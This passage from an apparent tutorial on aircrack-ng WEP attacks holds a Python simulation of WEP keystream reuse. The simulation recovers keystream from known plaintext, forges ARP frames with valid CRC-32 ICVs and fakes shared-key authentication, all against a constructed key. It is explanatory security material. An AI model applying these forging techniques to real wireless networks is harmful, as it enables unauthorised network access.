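802.11 header.

```python
"""WEP keystream reuse: the property behind aireplay-ng -5/-4 + packetforge-ng
(scenario 2) and the shared-key fake authentication aireplay-ng -1 -y (scenario 3).
Added example written for this page; not the post's code and not aircrack-ng's.
Every key, IV, challenge and address is constructed. Only the encrypted body of a
frame is modelled (IV, key-id byte, RC4 data); the 802.11 header is left out."""
import struct
import zlib

# LLC/SNAP header that starts every ARP frame on a WEP network (ethertype 0x0806).
# Known plaintext, so cipher XOR these 8 bytes gives 8 keystream bytes: the seed
# the fragmentation attack grows into a 1500-byte keystream by having the AP relay fragments.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))  # truncates to the shorter input


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian, encrypted with it."""
    return struct.pack("<I", zlib.crc32(data))


# --- AP and legitimate client: they hold the key ---
def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """iv (3 bytes) || key-id byte || RC4(iv||key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Decrypt and accept only if the ICV matches (the AP's check). None means dropped."""
    iv, body = frame[:3], frame[4:]
    pt = xor(body, rc4(iv + key, len(body)))
    return pt[:-4] if icv(pt[:-4]) == pt[-4:] else None


# --- attacker: never sees the key ---
def keystream(frame: bytes, known_plaintext: bytes):
    """Cipher XOR known plaintext = keystream for this frame's IV, as many bytes as are known."""
    return frame[:3], xor(frame[4:], known_plaintext)


def forge(iv: bytes, ks: bytes, plaintext: bytes) -> bytes:
    """packetforge-ng's job: a new plaintext with a fresh ICV under a recovered keystream,
    reusing its IV. WEP has no replay protection, so the AP accepts the frame."""
    body = plaintext + icv(plaintext)
    if len(body) > len(ks):
        raise ValueError("need %d keystream bytes, have %d" % (len(body), len(ks)))
    return iv + b"\x00" + xor(body, ks)


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP request, what packetforge-ng -0 builds (-k/-l 255.255.255.255 in the post)."""
    return (LLC_SNAP_ARP + struct.pack(">HHBBH", 1, 0x0800, 6, 4, 1)  # Ethernet, IPv4, hlen, plen, request
            + sender_mac + sender_ip + b"\x00" * 6 + target_ip)


def ska_fake_auth(seen_challenge: bytes, seen_response: bytes, new_challenge: bytes) -> bytes:
    """One observed shared-key handshake leaks 132 keystream bytes (128-byte challenge + ICV)
    under the client's IV; airodump-ng stores them as a .xor. Reuse them on the AP's next challenge."""
    iv, ks = keystream(seen_response, seen_challenge + icv(seen_challenge))
    return forge(iv, ks, new_challenge)


def demo():
    """Both attacks against a throwaway key; returns (ska_ok, forged_arp_ok, bitflip_rejected)."""
    key = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3")       # constructed 104-bit key, never passed to attacker code
    challenge = bytes(range(128))                             # constructed AP challenge text
    response = wep_encrypt(key, b"\x01\x02\x03", challenge)   # legitimate client's answer, captured
    # Scenario 3: the AP challenges the attacker with fresh text; the captured keystream answers it.
    fresh = bytes(reversed(range(128)))
    ska_ok = wep_decrypt(key, ska_fake_auth(challenge, response, fresh)) == fresh
    # Scenario 2: the same 132 bytes are enough for a 36-byte ARP request plus its 4-byte ICV.
    iv, ks = keystream(response, challenge + icv(challenge))
    arp = arp_request(bytes.fromhex("001cbf905ba3"), b"\xff" * 4, b"\xff" * 4)
    forged = forge(iv, ks, arp)
    arp_ok = wep_decrypt(key, forged) == arp
    # The ICV is only a CRC: it rejects line noise, not a forgery built on the keystream.
    damaged = forged[:-1] + bytes([forged[-1] ^ 0x01])
    return ska_ok, arp_ok, wep_decrypt(key, damaged) is None


if __name__ == "__main__":
    print("ska_ok, forged_arp_ok, bitflip_rejected =", demo())
```

The real fragmentation attack starts from only the 8 LLC/SNAP bytes `keystream(frame, LLC_SNAP_ARP)` yields and grows them by sending 4-byte fragments the AP reassembles and relays under its own IV; chopchop instead recovers the plaintext byte by byte from the end (the pt column above). Both end where this example starts: a keystream long enough for `forge()`. Note also what the last return value shows: the AP's ICV check is a CRC-32, so a frame built from a recovered keystream passes it just like a genuine one, which is why none of this needs the key.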
